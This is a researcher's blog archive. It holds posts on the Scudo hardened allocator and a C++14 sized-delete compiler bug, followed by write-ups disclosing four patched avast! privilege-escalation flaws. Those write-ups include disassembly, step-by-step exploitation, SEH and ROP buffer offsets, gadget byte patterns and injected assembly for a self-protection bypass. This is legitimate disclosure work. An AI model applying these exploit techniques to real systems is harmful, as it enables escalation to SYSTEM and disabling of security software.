Tuesday, May 14, 2019

High level overview of Scudo

With this post, I am going to go through some high level details about the architecture of the allocator and some of the security features offered. Some notions will be skimmed through, with the hopes of being covered in detail in a later post (based on my free time).

Scudo is made up of the following components:

  • a "primary" allocator: this is a fast allocator, servicing smaller sized requests (configurable at compile time). It is "segregated", eg: chunks of the same size end up in the same memory region, that is compartmentalized from other regions (the separation is stronger on 64-bit, where a memory area is specifically reserved for the primary regions); chunks allocated by the primary are randomized to avoid predictable address sequences (note that the larger the size, the more predictable the addresses are to each other). A couple of side effects to this design, is that there is no such thing as coalescing contiguous blocks, and that the memory used by the primary is never unmapped - but it can be reclaimed. While we are trying to focus on 64-bit, there is a 32-bit primary, mostly due to Android;
  • a "secondary" allocator: which wraps the platform memory allocation primitives, and as such is slower and used to service larger sized allocations. Allocations fulfilled by the secondary are surrounded by guard pages;
  • local caches: those are thread specific stashes, holding pointers to free blocks in order to relieve contention over the global free-list. There are two models: exclusive and shared. With the exclusive model, there is a unique cache per thread, which is more memory hungry but mostly free of contention. With the shared model, threads share a set number of caches, that can be dynamically reassigned at runtime based on contention - this uses less memory than the exclusive model and usually fits better the needs of end user platforms.
  • a "quarantine": which can be equated to a heap wide delayed free-list, holding recently freed blocks for a time until a criteria is met (usually, a certain size is reached), before returning them to the primary or secondary for reuse. There is a thread-specific quarantine, and a global quarantine to avoid as much as possible global locking. This is the most impactful in terms of memory usage and to some extent performances: even smaller sized quarantines will have a large impact on a process RSS, and it effectively kills locality, making any sort of memory cache less useful. As such, it is disabled by default, and can be enabled on a per-process basis (and sized according to the process needs).

Now for some security "features":

  • strong sizes and alignment requirements: we enforce maximum sizes and alignment values, but also check that pointers provided are properly aligned; those are cheap checks to avoid integer overflows and catch low hanging deallocation errors (or abuse);
  • each chunk is preceded by a header, that stores basic information about the allocation, and is checksummed to be able to detect corruption.
    While the debate in-band vs out-of-band metadata divides people, the choice for an in-band header was made to be able to detect linear {over,under}flows (at least until we get memory tagging).
    The checksum of the header involves a global secret, the pointer being dealt with, and the content of the header - it is not meant to be cryptographically strong. As for the data stored in the header, it holds the size of the allocation, the state of the chunk (available, allocated, quarantined), its origin (malloc, new, new[]) and some internal data. Headers are manipulated atomically to detect race attempts between threads operating on the same chunk.
    As is usually the case with this type of mitigation, inconsistencies are only detected when the header is checked, which usually means that a heap operation has to occur on the chunk in question.
    Overall, this allows for several security checks:
    • ensure that a pointer being deallocated actually points to a chunk, otherwise the checksum verification will fail. Some other allocators gladly accept a pointer pointing to the middle of a chunk for deallocation, we do not;
    • ensure that the state of a chunk is consistent with the operation being carried out. This allows for detection of double-frees and the like;
    • ensure that a sized-deallocation is valid for the targeted chunk, which allowed to find an Intel C Compiler bug, and prevents related abuse;
    • ensure that the deallocation function is consistent with the allocation function that returned the targeted chunk (eg: free/malloc, delete/new);
  • we randomize everything we can, to reduce predictability as much as possible; one of the side benefits of the thread caches is that they can make it more difficult for an attacker to get the chunks they want in the state they need, if they leverage allocation primitives in different threads;
  • guard pages are added when deemed useful;
  • we do not store pointers in free chunks, or anything really. Our arrays of free pointers (what we call transfer batches) are located in separate memory region;
  • the quarantine helps mitigate use-after-free to some extent, making it harder for an attacker to reuse a deallocated chunk. This mitigation only goes so far, as a chunk will end up being reused at some point in time (unless you have unlimited memory);
  • the non-standalone version of Scudo also offers the possibility to set an RSS limit, which results in the allocator returning null pointers if said soft limit is exceeded (or aborting if a hard limit is set); this allows to quickly check the resilience of an application to OOM conditions - I still have to add that feature to the standalone version.

Friday, May 10, 2019

What is the Scudo hardened allocator?

I am going to make a small series of posts about the Scudo hardened allocator, starting with some general considerations then getting into technical details.

Scudo is a user-mode allocator which aims at providing additional mitigation against heap based vulnerabilities, while maintaining good performance. It’s open-source, part of LLVM’s compiler-rt project, and external contributions are welcome.

Scudo is currently the default allocator in Fuchsia, is enabled in some components in Android, and is used in some Google production services. While it was initially implemented on top of some of sanitizer_common’s components, it is being rewritten to be standalone, without dependencies to other compiler-rt parts, for easier use (and additional performance and security benefits).

Why another allocator?

The journey started a few years ago while exploring the landscape of usermode allocators on Linux. It is no secret that Google uses tcmalloc, and in all honesty, the internal version is blowing everything else away. By a lot. But as it was noted by my esteemed former-colleagues Sean and Agustin, its resilience to abuse is ... lackluster, to say the least.

To understand our options, let’s have a look at a somewhat typical benchmark for production services at Google, involving a lot of asynchronous threading, protobufs, RPCs and other goodies, all of that running on a 72 core Xeon machine with 512GB of RAM (this is not meant to be the most rigorous of comparison, but give you an idea of what’s up). The first metric is the number of Queries Per Second, the second is the peak RSS of the program (as reported by /usr/bin/time).


Allocator

QPS (higher is better)

Max RSS (lower is better)

tcmalloc (internal)
410K
357MB
356K
1359MB
dlmalloc (glibc)
295K
333MB
142K
710MB
24K
393MB
18K
458MB
FATALERROR**

SIGSEGV***

scudo (standalone)
400K
318MB

* hardened_malloc is mostly targeting Android, and only supports up to 4 arenas currently so the comparison is not as relevant as it strongly impacts concurrency. Increasing that number yields to mmap() failures.
** Guarder only supports up to 128 threads per default, increasing that number results in mmap() failures. Limiting the number of threads is the only way I found to make it work, but then the results are not comparable to the others.
*** I really have no idea how real world payloads ever worked with those two.

tcmalloc & jemalloc are fast, but not resilient against heap based vulnerabilities. dlmalloc is, well, sometimes more secure than others, but not as fast. The secure allocators are underperforming, when working at all. I am not going to lie, some benchmarks are less favorable to Scudo, some others more, but this one is representative of one of our target use cases.
The idea of Scudo is to fall in the category of “as fast as possible while being resilient against heap based bugs”. Scudo is not the most secure allocator, but it will (hopefully) make exploitation harder, with a variety of configurable options that allow for increased security (but that comes with a cost in performance and memory footprint, like the Quarantine). It is also meant to be a good working ground for future mitigation (such a memory tagging, or GWP-ASan).

Origins

While various options for improving existing allocators were considered, a meeting with Kostya Serebryany‎ lead to the plan of record: building upon the existing sanitizer_common allocator to create a usermode allocator that would be part of LLVM’s compiler-rt project.

The original sanitizer allocator, which is used as a base for the ones of ASan, TSan, LSan, was originally written by Kostya and Dmitry Vyukov‎, and featured some pretty neat tricks that made it fast, and extensible.

A decent amount of things had to be changed (things were allocated from a fixed base address, in a predictable fashion, overall memory consumption was on higher side, etc). The original version targeted Linux only, and then support came for other Google platforms, Android first, and then Fuchsia.

Aleksey Shlyapnikov did some work to make Scudo work on Solaris with SPARC ADI for some memory tagging research, but that work was never upstreamed. I will probably revisit that at some point. As for other platforms, they will be up to the community.

Fuchsia decided to adopt Scudo as their default libc allocator, which required rewriting the code to remove dependencies to sanitizer_common - and we are reaching the final stages of the upstreaming process.

Tuesday, August 14, 2018

About the C++14 sized delete operator

Alright, I am breaking a 3-year-posting-slumber here. Don't get too excited,  I am probably not going to post regularly but I will try and share some security and/or allocator related thoughts here.

One of the novelties introduced by C++14 was sized delete operators. Taking an extra size_t parameter, those are meant for efficiency purposes, allowing to avoid a potentially costly lookup of the size of a chunk, to quote N3536:
Modern memory allocators often allocate in size categories, and, for space efficiency reasons, do not store the size of the object near the object. Deallocation then requires searching for the size category store that contains the object. This search can be expensive, particularly as the search data structures are often not in memory caches.
And this is indeed the case. While someone can directly call the sized delete operator, it's usually up to the compiler to the heavy lifting, specifying the command line flag -fsized-deallocation; but it is usually enabled for -std=c++14 and above (see gcc c++ dialect options).

So what happens on the allocator side when the sized deallocation function is used? The allocator usually has fast path function that will use the size provided to look up where the chunk will end up (see tc_free_sized for tcmalloc, je_sdallocx for jemalloc). That's great, no size to compute for a given pointer, it's faster.  But it implies that the compiler gets it right all the time (or that a programmer doesn't blindly call the sized operator with a wrong size, or that a malicious user doesn't pass a mismatched pointer to a sized deallocation function), otherwise the deleted chunk ends up in the wrong bin/freelist/*, and when it's later returned to fulfill an allocation, something bad is likely to happen.

My catastrophic thinking self expected this was going to go wrong at some point, but as far as I can tell, there was nothing much in the world of exploitable bugs related to this, except for the early implementation hiccups.

ASan's allocator has an optional check for this, and so does Scudo (an allocator I work on): if the size passed to the deallocation doesn't match the one of the chunk being deallocated, kill things as something is terribly wrong somewhere (but do not trust the size passed in any case - so much for efficiency 😕).

But then a few days ago, it was pointed out that the Intel Compiler was totally messing up the sized deallocation (see the compiled code). The consequences of this are entirely dependent on the allocator being used at runtime, and it looks like for most this could just result in some wasted memory (a large chunk ending up in a smaller bin), but that likely requires some additional digging (TODO(cryptoad) I guess). Anyway, if you compiled anything with ICC 18.0.0 in C++14 mode, update your compiler and recompile your binaries!

The reporter found the issue using Scudo, and it makes me somewhat happy that the check found a meaningful justification. Anyway, if you have examples of a sized deallocation gone wrong, feel free to chime in.

Thursday, August 6, 2015

avast! Shatter Attack EoP

Here is another issue in avast!, in the GUI AvastUI.exe. It allowed arbitrary code execution within the context of that trusted process, and as such EoP, self-protection bypass, etc. Exploit is provided. It was fixed about a year ago by the avast! crew.

Summary

Bug type: arbitrary function call
Vector: window message to asw_av_tray_icon_wndclass
Impact: untrusted code execution within the trusted AvastUI.exe process
Verified on: avast! Free AvastUI.exe v9.0.2018.391

Foreword

It's been a while since I had used a shatter attack for an interesting purpose! Trendy about 10 years ago (according to Wikipedia), they allowed privilege escalation thanks to core components of Windows like with MS02-071. They are mostly extinct due to Windows now restricting the messages sent to more privileged processes, or isolation of services in session 0. An old but very good presentation of the excellent Brett Moore explains them in detail.

But the problem resurfaces when a process attempts to introduce home-made integrity levels, while functioning as the current logged in user (and at the same IL). This new security boundary can be shattered thanks to Windows messages.

Description

Since we are running in the same context as AvastUI.exe, we can pretty much send any window message to its windows. This appears to be something that the developers didn't think about. For example, the window corresponding to the window class asw_av_tray_icon_wndclass accepts quite a bit of user messages. The following piece of code handles the message 0x83fd:

.text:00551BC0 kk_CWndWM83FDh  proc near               ; DATA XREF: .rdata:00677314 o
.text:00551BC0
.text:00551BC0 wParam          = dword ptr  8
.text:00551BC0 lParam          = dword ptr  0Ch
.text:00551BC0
.text:00551BC0                 push    ebp
.text:00551BC1                 mov     ebp, esp
.text:00551BC3                 mov     eax, [ebp+wParam]
.text:00551BC6                 test    eax, eax
.text:00551BC8                 jz      short loc_551BD3
.text:00551BCA                 push    [ebp+lParam]
.text:00551BCD                 call    eax
.text:00551BCF                 pop     ebp
.text:00551BD0                 retn    8
.text:00551BD3 ; ---------------------------------------------------------------------------
.text:00551BD3
.text:00551BD3 loc_551BD3:                             ; CODE XREF: kk_CWndWM83FDh+8 j
.text:00551BD3                 xor     eax, eax
.text:00551BD5                 pop     ebp
.text:00551BD6                 retn    8
.text:00551BD6 kk_CWndWM83FDh  endp

As you can see, this handler will interpret wParam as a function pointer and lParam as its first and only argument and call it. This obviously becomes an issue when the message is sent by a 3rd party application as it pretty much guarantees code execution within the AvastUI.exe process.

This call primitive is ideal to execute a function like LoadLibrary. We have to make the first parameter point to a string locating the DLL on the drive. Given that we are local, and that Windows doesn't do per-process randomization of DLLs, we already know the address of LoadLibraryA.

But one has to be a bit imaginative to know how to place the string into the AvastUI.exe process memory at a known location. One of the solutions that I found (that restricts the path to the DLL to *44* bytes), is to use a functionality that would put memory under our control at a known offset into
the .data section of AvastUI.exe. This requires some interaction with the named pipe \\.\pipe\snx_sdesktop_pipe. The process AvastUI.exe creates 10 of those, and reads from them in the following code:

.text:0054E159                 mov     ecx, [ebp+var_30]
.text:0054E15C                 push    0               ; lpOverlapped
.text:0054E15E                 shl     ecx, 4
.text:0054E161                 add     ecx, [ebp+var_30]
.text:0054E164                 lea     eax, [ebp+var_8]
.text:0054E167                 push    eax             ; lpNumberOfBytesRead
.text:0054E168                 push    44              ; nNumberOfBytesToRead
.text:0054E16A                 lea     eax, (g_NamedPipeStructures+4)[ecx*4]
.text:0054E171                 push    eax             ; lpBuffer
.text:0054E172                 push    g_NamedPipeStructures[ecx*4] ; hFile
.text:0054E179                 call    ds:ReadFile

What I called g_NamedPipeStructures is located in the .data section of AvastUI.exe and is an array of 10 structures containing the handle to the pipes followed by a 44 byte array receiving the information read from the pipe.

In order to know where this structure is located in AvastUI.exe, we load the binary within our process and locate the structure thanks to a code signature. If there is no address space collision that would trigger a remapping elsewhere, that address will be the same in the remote process. We then open the 10 named pipes and write the DLL path to them to make sure all the structures will be filled with our data. Then we locate the window, and send it the window message with LoadLibraryA as wParam and the 1st structure address as lParam. This will load the DLL within the AvastUI.exe process.



In my exploit, the DLL in question will spawn a cmd.exe and call the IOCTL to make it trusted. Obviously raising a cmd.exe to trusted doesn't make much sense in a real world exploitation scenario, this is just more of a visual example.


Tuesday, August 4, 2015

avast! TaskEx RPC EoP (and potential RCE)

Here is a new bug, this time in English. Since most of the logic issues have been dealt with, this one will be a memory corruption, with exploit. Once again, it was patched about a year ago by the avast! team.

Summary

Bug type: stack overflow
Vector: LPC (or RPC if the ncacn_ip_tcp Chest endpoint is enabled)
Impact: EoP (or unauthenticated RCE)
Verified on: avast! Free ashTaskEx.dll v9.0.2018.391

Description

The ashTaskEx.dll implements an RPC interface that is bound to a local ncalrpc endpoint, this interface being 908d4c23-138f-4ac5-af4a-08584ae7c67b v1.0. Most of the functions offered by this interface do not enforce any specific checks and are accessible by unprivileged local users. Those functions are processed within the AvastSvc.exe binary, which runs as SYSTEM.

The function with opcode 8 of this interface has the following IDL prototype (note that the function name is mine, not a symbol):

long   kk_RpcStartRescueDiscToolkit (
 [in] handle_t  arg_1,
 [in][ref][string] wchar_t * arg_2,
 [in] long  arg_3,
 [in][ref][string] wchar_t * arg_4,
 [in] long  arg_5
);

After unmarshalling the RPC request, it ends up calling tskexStartRescueDiscToolkitImpl:

.text:64804575                 mov     [ebp+ms_exc.registration.TryLevel], 0
.text:6480457C                 push    0               ; int
.text:6480457E                 push    eax             ; RPC_arg_5
.text:6480457F                 push    [ebp+RPC_arg_4] ; int
.text:64804582                 push    ebx             ; RPC_arg_3
.text:64804583                 push    [ebp+RPC_arg_2] ; wchar_t *
.text:64804586                 call    tskexStartRescueDiscToolkitImpl

It will compare the first string with a hardcoded GUID:

.text:6480890E                 mov     ebx, [ebp+arg_0]
.text:64808911                 push    esi
.text:64808912                 push    edi
.text:64808913                 push    offset aBf0f4731Dd254a ; "{BF0F4731-DD25-4A94-8E32-F94103856229}"
.text:64808918                 push    ebx             ; wchar_t *
.text:64808919                 mov     [esp+440h+var_42C], eax
.text:6480891D                 call    ds:_wcsicmp

Edit: opcode 7 has the exact same vulnerability, with a different GUID check, and the exploit below is for that function.
If the comparison succeeds, it will process to copying the second string into a stack buffer:

.text:6480894E                 mov     eax, [ebp+arg_8]
.text:64808951                 lea     edx, [esp+438h+var_214]
.text:64808958                 sub     edx, eax
.text:6480895A                 lea     ebx, [ebx+0]
.text:64808960
.text:64808960 loc_64808960:                           ; CODE XREF: tskexStartRescueDiscToolkitImpl+7D j
.text:64808960                 movzx   ecx, word ptr [eax]
.text:64808963                 mov     [edx+eax], cx
.text:64808967                 lea     eax, [eax+2]
.text:6480896A                 test    cx, cx
.text:6480896D                 jnz     short loc_64808960

As you can see here, the destination buffer var_214 is located on the stack, and can hold at most 0x210 bytes before reaching the stack cookie. The copy operation looks like a an inlined wcscpy. There is no check on the length of the string prior to copy.

This results in a stack overflow condition, that can be exploited to achieve code execution and EoP to SYSTEM. Note that the /GS cookie check has to be bypassed to achieve this, which requires exploiting the exception handler or disclosing memory.

A heap overflow will also happen in the subfunction called by tskexStartRescueDiscToolkitImpl if the string we sent is too large, but not large enough to reach the end of the stack. It only allocates 0x4e8 bytes for the structure the string is copied in:

.text:64809D68                 push    4E8h            ; unsigned int
.text:64809D6D                 call    ??2@YAPAXIABUnothrow_t@std@@@Z ; operator new(uint,std::nothrow_t const &)

Remote exploitation

While this bug is a default local EoP on avast! Free, if the Chest remote RPC endpoint (ncacn_ip_tcp) is enabled (either in avast! Endpoint Protection or by playing with the .ini files), then this bug becomes an RCE. See the following MSDN entry about this:

"Be Wary of Other RPC Endpoints Running in the Same Process"
http://msdn.microsoft.com/en-us/library/windows/desktop/aa373564(v=vs.85).aspx

Exploit


Here are some explanations:
  • we exploit a stack overflow in an LPC interface offered by ashTaskEx.dll;
  • this function is protected by a /GS cookie, so the usual route is to go through overwriting the exception handler, which on newer platforms requires to use a handler in a binary not protected by SafeSEH (this assumes that we overflow enough to get a memory access violation prior to the cookie being checked);
  • algo.dll is not SafeSEH protected. algo.dll is shipped with definitions, so I attempted my best to do something decently generic that will locate the latest version of algo.dll by looking up some registry keys and entries in the .INI files;
  • we want the overwritten exception handler to point to a gadget into algo.dll that somewhat restores the stack pointer to somewhere under our control. Luckily the DLL contains quite a lot of add esp,const & retn that will do that (with const in a ~800h-~1000h range);
  • we load algo.dll in our process, and look for that gadget. It is to be noted that given how Windows works, the base address of algo.dll in our process will be the same than in AvastSvc.exe unless we are quite unlucky;
  • at this point, we just have to build a ROP chain that will do something interesting;
  • since we are local, I decided to do something that would LoadLibrary a DLL under my control. To do so, I make one of the registers point to one of the strings sent into the RPC request (the one that didn't overlow) with some basic additions, copy it in some safe place (the .data section of algo.dll), restore a register to LoadLibraryW and trigger a push & call combination that will load the library as SYSTEM;
  • the library just creates a cmd.exe as SYSTEM on WinSta0 (you need to click a dialog to see it but at this point you see that it's won);
DeepScreen might be annoying and block access to the files, so run it without parameters for the first time to just load the DLL in the current process, and once DeepScreen is happy, run it again with 'run' as parameter to trigger the overflow. The irony here is that the overflow can happen within the DeepScreen sandbox, even if the original ends up being blocked!

Some constants that you might need to adjust based on your platform:

FillMemory( pbBuffer, 0x1000, 'A' );

Our overflowing buffer will be 0x1000 bytes. In most cases it's enough to go past the end of the stack and trigger an AV, but sometimes there is another page (or several) after the stack and that size might have to be increased.

*( DWORD_PTR * )( &pbBuffer[0x354] ) = ( DWORD_PTR )0xffffffff;          //SEH
*( DWORD_PTR * )( &pbBuffer[0x358] ) = g_GadgetLocations[0].dwpLocation; //add esp,818 & retn

Here we require that the SEH structure be at 0x354 bytes from the beginning of our overflowing buffer. This is likely specific to Windows 7 SP1 x86 up to date.

*( DWORD_PTR * )( &pbBuffer[0x20c] ) = g_GadgetLocations[1].dwpLocation; // xchg eax,ebp & retn
*( DWORD_PTR * )( &pbBuffer[0x210] ) = g_GadgetLocations[2].dwpLocation; // pop ecx & retn
*( DWORD_PTR * )( &pbBuffer[0x214] ) = ( DWORD_PTR )0xfffffc24; //ecx

Here, we require that esp+0x818 at the time of the exception handling lands at 0x20c from the beginning of our buffer. The other requirement is that our second string is at 0x3dc (-0xfffffc24) bytes from ebp at the time of the exception handling. Those are pretty much the only things that can differ from one platform to another given the same ashTaskEx.dll version.

The gadgets are pretty self explanatory:

    { { 0x81, 0xc4, 0x18, 0x08, 0x00, 0x00, 0xc3 }, 7, 0 }, //add esp,818h & retn
    { { 0x95, 0xc3 }, 2, 0 }, //xchg eax,ebp & retn
    { { 0x59, 0xc3 }, 2, 0 }, //pop ecx & retn
    { { 0x2b, 0xc1, 0x5b, 0xc3 }, 4, 0 }, //sub eax,ecx & pop ebx & retn
    { { 0x96, 0xc3 }, 2, 0 }, //xchg eax,esi & retn
    { { 0xb8, 0x90, 0x00, 0x00, 0x00, 0xc3 }, 6, 0 }, //mov eax,90h & retn
    { { 0x5d, 0xc3 }, 2, 0 }, // pop ebp & retn
    { { 0x83, 0xc4, 0x0c, 0x5e, 0x5d, 0x5f, 0x5b, 0x83, 0xc4, 0x08, 0xc2, 0x14, 0x00 }, 13, -8 }, //call _memcpy sequence
    { { 0x58, 0xc3 }, 2, 0 }, //pop eax & retn
    { { 0x55, 0xff, 0xd0, 0x0f, 0xb6, 0xc0 }, 6, 0 }, //push ebp & call eax & movzx eax,al & ...

We restore eax from ebp, restore ecx from the stack, subtract ecx from eax, withsome trash ending up in ebx. Then we set eax, esi and ebp so that we can call a memcpy gadget that copies our string into the .data section of the algo.dllbinary. We then call LoadLibraryW on our DLL, and ExitProcess gracefully.

Here the main exploit file, it's the only interesting one anyway:


Monday, August 3, 2015

avast! Contournement de la protection personnelle

Voici un autre probleme de logique, cette fois-ci au niveau noyau. Il a ete corrige l'annee derniere dans les version vulnerables d'avast!.

Resume

Type de vulnerabilite: probleme de logique
Vecteur: IOCTL a \\.\aswSP_Open
Impact: contournement de la protection personnelle (rendre un processus "de confiance")
Verifie sur: avast! Free aswSP.sys v9.0.2018.391

Description

La protection personnelle d'avast! (self-protection en Anglais) permet au programme de se proteger de programmes malicieux. Elle est implemente dans le module noyau aswSP.sys et utilise un concept de niveau de confiance pour les processus executes sur le systeme. aswSP.sys offre une variete de peripheriques et IOCTLs associes, mais une grande partie d'entre eux requiert des privileges administratifs, ou d'etre appele depuis un processus de confiance. Cependant, certain d'entre eux sont accessibles par des utilisateurs non privilegies, notamment au travers de \\.\aswSP_Open.

Par example, pour savoir si la protection personnelle est activee, on peut interroger l'IOCTL 0xb2d60190, et pour savoir si un processus est de confiance, 0xb2d600cc. Les processus de confiance executes par defaut sont System, AvastSvc.exe, AvastUI.exe et afwServ.exe sur les versions ayant le parefeu. Cela est illustre par le script Python suivant:


Un processus de confiance peut modifier le niveau de confiance d'un autre processus. Un IOCTL (0xb2d60198) permet a un processus de devenir de confiance, mais son fonctionnement est quelque peu alambique. Cet IOCTL prend pour parametre en entree un buffer de 0x19 octets qui contient, entre autres, deux pointeurs de fonction en mode utilisateur (Ring 3). Le code de l'IOCTL va determiner dans quel module se situent ces deux pointeurs, et verifier sa signature. Il ne s'agit pas d'une signature de binaire normale de Windows, mais une signature specifique a avast!. Si le binaire n'est pas signe, ou si la signature est invalide, l'appel va echouer. Par contre si tout se passe bien, le pilote noyau va mettre en queue un APC utilisateur qui executera un des pointeurs de fonction. En fonction de ce que va faire cette procedure (modifier les parametres passes), le pilote finira par appeler une fonction qui monte le niveau de confiance du processus dont le PID a ete passe dans le buffer d'entree.

.text:0001981C kk_SetProcessTrustCallback proc near    ; DATA XREF: kk_aswSP_Open_DispatchIoControl+2B7 o
.text:0001981C
.text:0001981C arg_0           = dword ptr  8
.text:0001981C
.text:0001981C                 mov     edi, edi
.text:0001981E                 push    ebp
.text:0001981F                 mov     ebp, esp
.text:00019821                 mov     eax, [ebp+arg_0]
.text:00019824                 movzx   ecx, byte ptr [eax+8]
.text:00019828                 push    ecx             ; char
.text:00019829                 push    dword ptr [eax+4] ; PVOID
.text:0001982C                 call    kk_SetProcessTrust0Or2
.text:00019831                 pop     ebp
.text:00019832                 retn    4
.text:00019832 kk_SetProcessTrustCallback endp

Afin de prevenir certains abus possibles, le pilote verifie que le processus appelant l'IOCTL n'est pas en train d'etre debogue:

.text:00019496                 push    ebx             ; ReturnLength
.text:00019497                 push    4               ; ProcessInformationLength
.text:00019499                 lea     eax, [ebp+var_3C]
.text:0001949C                 push    eax             ; ProcessInformation
.text:0001949D                 push    ProcessDebugPort ; ProcessInformationClass
.text:0001949F                 push    0FFFFFFFFh      ; ProcessHandle
.text:000194A1                 call    ds:NtQueryInformationProcess

Un des scenarios qui semble-t-il n'a pas ete pris en compte par les developpeurs d'avast! est la possibilite de lancer un binaire avast! signe en mode suspendu, puis d'y injecter une tache. Bien evidemment cela necessite que vous fournissions des pointeurs de fonctions pour le buffer d'entree de l'IOCTL au sein du binaire en question, et que ces pointeurs soient suffisamment interesssants pour qu'on finisse par executer du code sous notre controle. On peut par exemple utiliser un trampoline qui  lit un pointeur de fonction depuis la section .data du binaire et l'execute:

.text:005E0BCD                 mov     eax, dword_7114F8
.text:005E0BD2                 test    eax, eax
.text:005E0BD4                 jz      short loc_5E0BE4
.text:005E0BD6                 lea     ecx, [ebp+var_30]
.text:005E0BD9                 push    ecx
.text:005E0BDA                 push    3
.text:005E0BDC                 call    eax ; dword_7114F8

Ce gadget se trouve dans AvastUI.exe, un binaire signe par avast!

Afin de transformer notre code en code de confiance, il nous suffit de suivre les etapes suivantes:

  • creer AvastUI.exe (ou un autre binaire signe contenant un gadget acceptable) en mode suspendu
  • injecter une tache (en fait j'ai ecrit une DLL pour ca) qui va:
    • trouver le gadget dans le binaire (ici 005E0BCD)
    • ecrire le pointeur de fonction que nous voulons executer (ici a dword_7114F8)
    • appeler l'IOCTL 0xb2d60198 en contruisant correctement le buffer d'entree

Ainsi les verifications faites par le pilote vont reussir, et notre fonction va etre executee via un APC utilisateur. Maintenant pour que le pilote change le niveau de confiance du processus, il faute que cette fonction modifie un parametre de la facon suivant:

__declspec( naked ) DWORD UserModeAPCFunction( )
{
    __asm
    {
        //int 3
        mov eax, dword ptr [esp + 10h]
        test eax,eax
        jz skip
        mov dword ptr [eax], 41414141h
skip:
        xor eax,eax
        add esp, 0Ch
        ret
    }
}

A partir d'ici, notre code est de confiance, et on peut faire ce que l'on veut avec l'antivirus (EoP, desactivation, etc).


Voici le code de la DLL a injecter:

Thursday, July 30, 2015

avast! Cache a Virus RPC EoP (et RCE potentiel dans certaines versions)

Un autre probleme corrige dans avast! il y a un peu plus d'un an. Et encore une fois, une vulnerabilite qui ne necessite pas de corruption memoire. Comme le dit le dicton, les corruptions memoire, c'est pour plus tard.

Resume

Type de vulnerabilite: probleme de logique
Vecteur: appel LPC (ou RPC) a c6c94c23-538f-4ac5-b34a-00e76ae7c67a v1.0
Impact: EoP a SYSTEM, ou RCE potentiel dans les versions entreprises d'avast!
Verifie sur: avast! Free ashServ.dll v9.quelquechose

Description

La cache a virus d'avast! est controlee par une interface RPC implementee dans ashServ.dll, cette interface etant c6c94c23-538f-4ac5-b34a-00e76ae7c67a v1.0. Par default, cette interface n'ecoute que sur un point de terminaison local (ncalrpc), mais dans certaines configurations du logiciel - notamment les versions entreprises - elle peut aussi ecouter sur un port TCP (ncacn_ip_tcp). Aucune de ces deux interfaces ne requerait d'authentification, mais certaines fonctions necessitaient un mot de passe sous forme de chaine de characteres dans les donnees RPC (verifie via MD5). Sur une connexion locale (ou si l'option de configuration de la cache "CheckPassword" est desactivee), le mot de passe n'etait pas verifie.

.text:6512BC91                 call    ds:RpcStringBindingParseW
.text:6512BC97                 test    eax, eax
.text:6512BC99                 jnz     loc_6512BD24
.text:6512BC9F                 push    offset aNcalrpc ; "ncalrpc"
.text:6512BCA4                 push    [ebp+Protseq]   ; wchar_t *
.text:6512BCA7                 call    ds:_wcsicmp
.text:6512BCAD                 add     esp, 8
.text:6512BCB0                 test    eax, eax
.text:6512BCB2                 jz      short AUTH_SUCCESS
.text:6512BCB4                 push    1
.text:6512BCB6                 push    offset aCheckpassword ; "CheckPassword"
.text:6512BCBB                 push    offset aChest   ; "Chest"
.text:6512BCC0                 call    ds:aswGetAvastPropertyInt
.text:6512BCC6                 add     esp, 0Ch
.text:6512BCC9                 test    eax, eax
.text:6512BCCB                 jz      short AUTH_SUCCESS

Le problem reside dans la fonction RestoreFile offerte par l'interface RPC. Une fois appelee pour un identifiant de fichier donne, la fonction de restauration va utiliser les proprietes OrigFolder et OrigFileName associees a ce fichier et restaurer aveuglement le fichier a l'emplacement specifie en tant que SYSTEM, et ce quelque soit le niveau de privilege de l'appelant.

.text:6512BA84                 push    104h
.text:6512BA89                 lea     eax, [ebp+var_834]
.text:6512BA8F                 push    eax
.text:6512BA90                 push    offset aOrigfolder ; "OrigFolder"
.text:6512BA95                 mov     ecx, esi
.text:6512BA97                 call    edi ; IaswObject::GetValue(wchar_t const *,wchar_t *,ulong,wchar_t const *) ; IaswObject::GetValue(wchar_t const *,wchar_t *,ulong,wchar_t const *)
.text:6512BA99                 push    offset word_65136530
.text:6512BA9E                 push    104h
.text:6512BAA3                 lea     eax, [ebp+var_424]
.text:6512BAA9                 push    eax
.text:6512BAAA                 push    offset aOrigfilename ; "OrigFileName"
.text:6512BAAF                 mov     ecx, esi
.text:6512BAB1                 call    edi ; IaswObject::GetValue(wchar_t const *,wchar_t *,ulong,wchar_t const *) ; IaswObject::GetValue(wchar_t const *,wchar_t *,ulong,wchar_t const *)
.text:6512BAB3                 lea     eax, [ebp+var_424]
.text:6512BAB9                 push    eax
.text:6512BABA                 lea     eax, [ebp+var_834]
.text:6512BAC0                 push    eax
.text:6512BAC1                 push    offset aSS_0    ; "%s\\%s"
.text:6512BAC6                 lea     eax, [ebp+var_21C]
.text:6512BACC                 push    104h            ; size_t
.text:6512BAD1                 push    eax             ; wchar_t *
.text:6512BAD2                 call    ds:_snwprintf

Pour elever ses privileges, un utilisateur local (ou distant) peut appeler la fonction RPC de la cache AddFile en specifiant les proprietes OrigFolder et OrigFileName comme etant celles d'un fichier qu'il veut ecraser (ou creer), et puis appeler la fonction RestoreFile. De cette facon, il peut ecraser tout binaire SYSTEM, ou creer un fichier MOF a-la-Stuxnet pour execute du code en tant que SYSTEM.

Pour avast! Free, c'est seulement un EoP, mais pour avast! Endpoint Protection, si le RPC de la cache est configure pour ecouter sur un port TCP (16108 par default), cela pourrait se transformer en RCE, le probleme etant que la fonction RestoreFile verifiait le mot de passe.

Notez que la fonction AddFile permet de specifier le contenu du fichier, modulo un "chiffrement" de type XOR avec une cle enorme. Le code suivant utilise impacket pour effecture la requete RPC (j'ai du enlever la cle parceque sinon pastebin part en vrille):